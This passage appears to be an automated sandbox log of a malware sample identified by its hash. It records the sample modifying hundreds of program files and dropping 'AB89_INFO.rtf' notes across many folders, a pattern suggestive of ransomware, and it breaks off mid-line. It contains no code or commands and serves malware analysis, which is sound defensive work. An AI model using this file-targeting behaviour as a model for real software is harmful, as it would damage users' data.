095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Apia 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\UninstallCompress.asx 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\unpack200.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Syowa 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console_1.0.300.v20131113-1212.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\Welcome.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Windows Journal\Templates\Graph.jtp 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+2 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp_3.6.300.v20140407-1855.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\EST5 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\pack200.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Funafuti 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\snmp.acl.template 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmiregistry.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\java.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\LogoBeta.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cayenne 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Troll 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql90.xsl 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ca.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jcmd.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\security\javaws.policy 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nassau 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Manila 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\HST 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyclient.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\chrome.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\UCT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Krasnoyarsk 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\psfont.properties.ja 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Lord_Howe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Petersburg 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Havana 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\meta-index 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-options-api.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-services.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-queries_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Macau 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstack.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Magadan 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\YST9YDT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Atikokan 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\deploy\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\eBook.api 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\20200616092334.pma 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Johannesburg 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\La_Paz 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-outline.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Tripoli 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Catamarca 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Currie 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\chrome_proxy.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\Center 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-11 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\boot_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-modules.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui.zh_CN_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\crashreporter.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javacpl.cpl 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.filesystem_1.4.100.v20140514-1614.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\it.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\sk.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\EmptyDatabase.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Shanghai 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.httpcomponents.httpcore_4.2.5.v201311072007.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Majuro 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\unpack200.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\RedoOut.mpe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Grand_Turk 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\pop3.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.zh_CN_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Text.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives_1.1.100.v20140523-0116.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-dialogs_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\dumpmeta.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Malta 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-text_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiling.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\zi\America\Kentucky\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\blacklist 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Fiji 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\indxicon.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\setup.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\es-419.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.STD 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Simferopol 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Honolulu 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Thule 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-attach.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Sydney 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\invalid32x32.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.actionProvider.exsd 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_olv.css 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\net.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Juneau 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\uk.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\gu.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cuiaba 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Kiev 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\zipfs.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Copenhagen 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe.sig 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\jmxremote.password.template 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\epl-v10.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_fr.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Porto_Velho 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Vancouver 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7TSFrame.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-coredump_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Pyongyang 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\sr.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files 